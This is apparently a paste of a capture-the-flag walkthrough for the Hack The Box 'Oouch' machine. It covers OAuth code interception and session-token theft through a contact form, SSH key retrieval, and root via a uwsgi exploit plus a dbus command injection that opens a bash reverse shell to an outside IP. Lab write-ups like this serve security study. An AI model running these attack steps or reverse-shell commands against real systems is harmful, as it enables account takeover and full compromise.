· 6 years ago · Mar 26, 2020, 06:38 AM
1step 1:-first create account on both ports 5000 and 8000
2step 2:-go to consumer.oouch.htb:5000/oauth after logging in you will get two links one is connect and other one is login
3step 3:- open burpsuite go to consumer.oouch.htb:5000/oauth/connect click authorize and intercept the request
4step 4:- forward the request until you see consumer.oouch.htb/oauth/connect/token?code=d4UfghXC5GTTWN6hombgggT7UU97, now copy this link and drop the request in burpsuite dont forward this request just copy the url and drop the request
5step 5:- go to the contact section and paste the link and send just paste the link and send and wait for 25-30 seconds
6step 6:- now after waiting 25-30 seconds go to consumer.oouch.htb:5000/oauth/login and click authorize
7step 7: you will be logged in as QTC
8step 8:-now go to authorization.oouch.htb:8000/oauth/applications and make an application of any kind but in the redirect url use your ip and port(4444),http://tun0:4444/ like this and save the application but make sure to copy all the parameters just intercept the request while saving and copy all the necessary parameters.
9step 9:-`now make a custom url in authorization.oouch.htb with the parameters u just copied like this
10http://authorization.oouch.htb:8000/oauth/authorize/?grant_type=authorization_code&redirect_uri=http://10.10.14.120:4444&client_id=FlsQK7zQw2PjMm7dowYByLoBM3Y67g3rHtussjH5&client_secret=5ORNzjAKBRrvJ6m2a8waTEFhhUDtWcrNz4wq8xfL5EGgnu3UBl5U2Tlsu1YNDxpN3S5ejCeCffoqkT9fEsdWtFqM6anf2url1oDol4qL031iujzwsy89VZdbEWiyPNZb
11now copy this url and paste again in contact form and send. make sure this time turn the netcat listener on so u will get session token of qtc
12srtep 10:-now login in port 8000 with the session token u got and generate access token like this curl -X POST 'http://authorization.oouch.htb:8000/oauth/token/' -H "Content-Type: application/x-www-form-urlencoded" --data "grant_type=client_credentials&client_id=CTiDn876oeqCJX8lA9NRb6naRky9pQQFaTCHd5RA&client_secret=fEK4aAnSF6oXdARDrV6C1w3LZznRzfhCmzgZNtla7pVUMRNBtllH7Jy4GhpgjZekLVwnSujUpOyqx2fyKjuxVZpmG5j7RjB0qDi6y6bFTtWeh19QtMvh5omFBwBtKhQZ" -L -s
13step 11:- the above parameters are your own parameters which u copied during making application
14step 12:-now make api call like this http://authorization.oouch.htb:8000/api/get_ssh/?access_token=blabla (note:-this is the access token you got and make sure to use session id of qtc also"u will get ssh key now formate the key like your ssh key with 38 lines and all
15step 13:-login as qtc@10.10.10.177 u will get user
16
17FOR root:-
18step 1:-NOW do ps -aux to view running process you will see docker running on ip 172.18.0.2 this might change so search for the ip using port 5000 now do ssh qtc@172.18.0.2
19step 2:-now use the exploit i have sent you there is no wget or netcat in machine so copy yhe exploit as base 64 and inside docker paste the script as exploit.py like this
20cat exploit.py | base64(in your local system also install xclip in you system)
21copy it
22now do this inside docker
23echo 'ctrl+shift+v' | base64 -d > exploit.py
24
25use it like this now python exploit.py -m unix -u uwsgi.socket -c " bash -c 'use bash reverse shell here' "and turn on netcat listener
26you wil get reverse shell as www-data now abuse the dbus using the command below
27dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block "string:;bash -c 'bash -i >& /dev/tcp/10.10.15.150/4445 0>&1'"
28
29here again u have to turn netcat listener on to get shell as root
30and rooted!